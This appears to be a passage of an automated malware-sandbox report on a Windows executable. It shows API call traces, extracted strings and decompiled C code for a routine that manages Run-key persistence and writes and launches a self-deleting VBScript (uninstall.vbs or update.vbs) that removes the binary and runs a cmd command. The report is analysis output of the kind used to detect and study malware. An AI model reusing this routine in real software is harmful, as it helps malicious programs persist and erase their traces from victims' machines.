                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 00408720
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                  • exit.MSVCRT ref: 00408980
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1819783940-1536747724
                                  • Opcode ID: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                  • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                  • Opcode Fuzzy Hash: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                  • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408245, Relevance: 110.5, APIs: 49, Strings: 14, Instructions: 260registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00408245() {
				char _v0;
				signed int _v5;
				char _v6;
				signed int _v9;
				char _v10;
				char _v24;
				char _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				char _v72;
				char _v76;
				char _v88;
				char _v92;
				void* _v108;
				void* _v124;
				void _v606;
				short _v608;
				short _v644;
				void* _t112;
				void* _t114;
				char* _t116;
				WCHAR* _t118;
				signed char _t120;
				char* _t121;
				char* _t123;
				char* _t126;
				char* _t127;
				char* _t128;
				short* _t131;
				void* _t132;
				char* _t134;
				WCHAR* _t137;
				char* _t138;
				char* _t140;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				signed int* _t148;
				char* _t149;
				char* _t150;
				signed int _t151;
				short* _t153;
				char* _t154;
				char* _t155;
				WCHAR* _t157;
				char* _t158;
				char* _t159;
				char* _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				intOrPtr* _t174;
				short* _t285;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t310;

				_t112 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t112 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t112 = E0041050F(_t112);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E00412BEE(_t112);
				}
				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000002, _t172, _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				_v608 = _v608 & 0x00000000;
				_t114 = memset( &_v606, 0, 0x81 << 2);
				asm("stosw");
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
				_t299 = _t297 + 0x28;
				if(_t116 == 0) {
					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t116);
				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_v5 = 1;
				_t118 =  *_t174(0x41bc68, 0x415800);
				if(_t118 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t118, 0x80);
				}
				_t120 = SetFileAttributesW( &_v608, 0x80);
				if(_t120 == 0) {
					_v5 = _v5 & _t120;
				}
				_t121 =  &_v6;
				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
				_t123 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
				L0041416A();
				_t301 = _t299 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
				if(_v5 != 0) {
					_t165 =  &_v608;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
					_t166 =  &_v72;
					L0041416A();
					_t167 =  &_v40;
					L00414146();
					_t301 = _t301 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t126 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
				_t127 =  &_v72;
				L00414146();
				_t128 =  &_v56;
				L00414146();
				_t303 = _t301 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				_push(0x415800);
				_push(0x41bc68);
				if( *_t174() != 0) {
					_t163 =  &_v72;
					L0041416A();
					_t129 =  &_v56;
					L00414146();
					_t303 = _t303 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
				_t304 = _t303 + 0x10;
				if(_t131 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
				}
				exit(0);
				_pop(_t280);
				_pop(_t291);
				_pop(_t175);
				_t305 = _t304 - 0x27c;
				_t132 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t132 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t132 = E0041050F(_t132);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E00412BEE(_t132);
				}
				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, _t176, _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
				_t306 = _t305 + 0x1c;
				if(_t134 == 0) {
					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t134);
				_v9 = 1;
				_t137 = SetFileAttributesW( &_v644, 0x80);
				if(_t137 == 0) {
					_v9 = _v9 & _t137;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t137 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t137, 0x80);
				}
				_t138 =  &_v10;
				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
				_t140 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
				L0041416A();
				_t308 = _t306 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
				if(_v9 != 0) {
					_t157 =  &_v644;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
					_t158 =  &_v76;
					L0041416A();
					_t159 =  &_v28;
					L00414146();
					_t308 = _t308 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t285 = L"\"\n";
				_t143 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
				_t144 =  &_v76;
				L00414146();
				_t145 =  &_v60;
				L00414146();
				_t310 = _t308 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v9 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t145 != 0) {
					_t154 =  &_v76;
					L0041416A();
					_t155 =  &_v60;
					L00414146();
					_t310 = _t310 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t146 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
				_t148 =  &_v9;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
				_t149 =  &_v28;
				L0041414C();
				_t150 =  &_v76;
				L0041414C();
				_t151 =  &_v60;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
				if(_t153 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
					if(_t153 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t153;
			}




































































                                  0x0040824e
                                  0x0040825a
                                  0x00408261
                                  0x00408261
                                  0x0040826d
                                  0x0040826f
                                  0x0040826f
                                  0x0040827b
                                  0x00408282
                                  0x00408289
                                  0x0040828e
                                  0x0040829e
                                  0x004082a8
                                  0x004082ac
                                  0x004082b5
                                  0x004082ba
                                  0x004082ba
                                  0x004082c4
                                  0x004082c8
                                  0x004082d5
                                  0x004082da
                                  0x004082da
                                  0x004082e4
                                  0x004082e8
                                  0x004082f9
                                  0x004082fe
                                  0x004082fe
                                  0x00408301
                                  0x00408316
                                  0x00408318
                                  0x00408321
                                  0x0040832a
                                  0x0040834a
                                  0x00408352
                                  0x00408357
                                  0x0040835c
                                  0x00408368
                                  0x00408368
                                  0x00408370
                                  0x00408378
                                  0x0040837e
                                  0x00408390
                                  0x00408394
                                  0x0040839a
                                  0x004083a6
                                  0x004083ad
                                  0x004083ad
                                  0x004083bf
                                  0x004083c7
                                  0x004083c9
                                  0x004083c9
                                  0x004083cc
                                  0x004083da
                                  0x004083e5
                                  0x004083f0
                                  0x004083fb
                                  0x00408401
                                  0x0040840d
                                  0x0040841d
                                  0x00408422
                                  0x00408428
                                  0x00408432
                                  0x0040843d
                                  0x00408447
                                  0x0040844e
                                  0x00408457
                                  0x00408460
                                  0x00408464
                                  0x00408469
                                  0x00408470
                                  0x00408479
                                  0x00408482
                                  0x0040848b
                                  0x0040848b
                                  0x0040849d
                                  0x004084a9
                                  0x004084b0
                                  0x004084b4
                                  0x004084bd
                                  0x004084c1
                                  0x004084c6
                                  0x004084cd
                                  0x004084d6
                                  0x004084df
                                  0x004084e8
                                  0x004084f2
                                  0x004084fc
                                  0x004084fc
                                  0x00408502
                                  0x00408503
                                  0x0040850a
                                  0x00408512
                                  0x0040851b
                                  0x00408524
                                  0x00408528
                                  0x0040852d
                                  0x00408534
                                  0x0040853d
                                  0x00408546
                                  0x00408546
                                  0x00408554
                                  0x00408560
                                  0x0040856a
                                  0x00408576
                                  0x0040857d
                                  0x00408582
                                  0x00408587
                                  0x0040858f
                                  0x0040859c
                                  0x0040859c
                                  0x004085a3
                                  0x004085a9
                                  0x004085aa
                                  0x004085ab
                                  0x004085af
                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
